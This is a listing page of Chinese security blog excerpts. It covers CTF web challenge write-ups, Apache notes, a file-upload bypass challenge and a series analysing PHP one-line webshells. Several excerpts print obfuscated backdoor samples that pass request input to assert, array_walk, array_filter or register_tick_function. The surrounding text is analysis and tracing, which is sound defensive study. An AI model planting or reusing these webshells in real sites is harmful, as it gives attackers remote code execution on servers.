0x01 view_source 0x02 get_post 这道题就是最基础的get和post请求的发送 flag:cyberpeace{b1e763710ff23f2acf16c2358d3132d3} 0x03 rebots Rebots.txt 是用来声明该网站中不想被爬虫访问的部分,这道题 ...
分类:
Web程序 时间:
2019-11-03 18:06:58
阅读次数:
463
0x01 this_is_flag 对!!!这就是flag 0x02 ext3 题目提示是Linux光盘,附件下载下来 在linux中挂载mount linux /mnt 找一下flagtrings linux | grep flag,发现在这个路径~root/Desktop/file/O7avZh ...
分类:
其他好文 时间:
2019-11-03 17:59:25
阅读次数:
624
WebShell代码分析溯源(十一) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];declare(ticks=1);register_tick_function ($e, $_REQUEST['GET']);?> 二、代码分析 1、调整代码格式 2、分析代码 2.1、首 ...
分类:
Web程序 时间:
2019-11-03 15:01:25
阅读次数:
89
Apache 使得一台服务器上放很多网站,网站同时访问 可以使网站更安全(木马如果是root权限 如果webshell apache 可用的命令很少) Apache 80端口(http) https 443端口(https) apache 1~1999 属于系统用户 Apache :指定监听的ip地 ...
分类:
Web程序 时间:
2019-11-02 16:05:29
阅读次数:
138
WebShell代码分析溯源(九) 一、一句话变形马样本 <?php $e = $_REQUEST['e'];$arr = array($_POST['pass'] => '|.*|e',);array_walk($arr, $e, '');?> 二、代码分析 1、调整代码格式 2、分析代码 1、首 ...
分类:
Web程序 时间:
2019-11-02 15:55:35
阅读次数:
94
WebShell代码分析溯源(五) 一、一句话变形马样本 <?php $e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e)); ?> 二、代码分析 1、调整代码格式 2、分析代码 首先使用R ...
分类:
Web程序 时间:
2019-11-01 13:12:58
阅读次数:
107
WebShell代码分析溯源(四) 一、一句话变形马样本 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").(" ...
分类:
Web程序 时间:
2019-10-31 13:27:58
阅读次数:
147
查看配置 开启日志功能 设置日志存储路径 ; 执行sql语句,写入日志文件 成功写入 ...
分类:
数据库 时间:
2019-10-31 10:31:08
阅读次数:
159
WebShell代码分析溯源(二) 一、一句话变形马样本 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 二、代码分析 1、调整代码格式 2、分析代码,首先先把”assert”字符串 ...
分类:
Web程序 时间:
2019-10-30 13:44:25
阅读次数:
93
bug 考查: 逻辑漏洞、文件内容检测绕过 ,文件头是位于文件开头的一段承担一定任务的数据,一般开头标记文件类型,如gif的gif89a,或gif87a, png的x89PNG\x0d\x0a,等等 register注册一个账号,然后登陆看看 点击manage会说你不是admin 也不是个sql注入 ...
分类:
其他好文 时间:
2019-10-30 11:56:00
阅读次数:
198
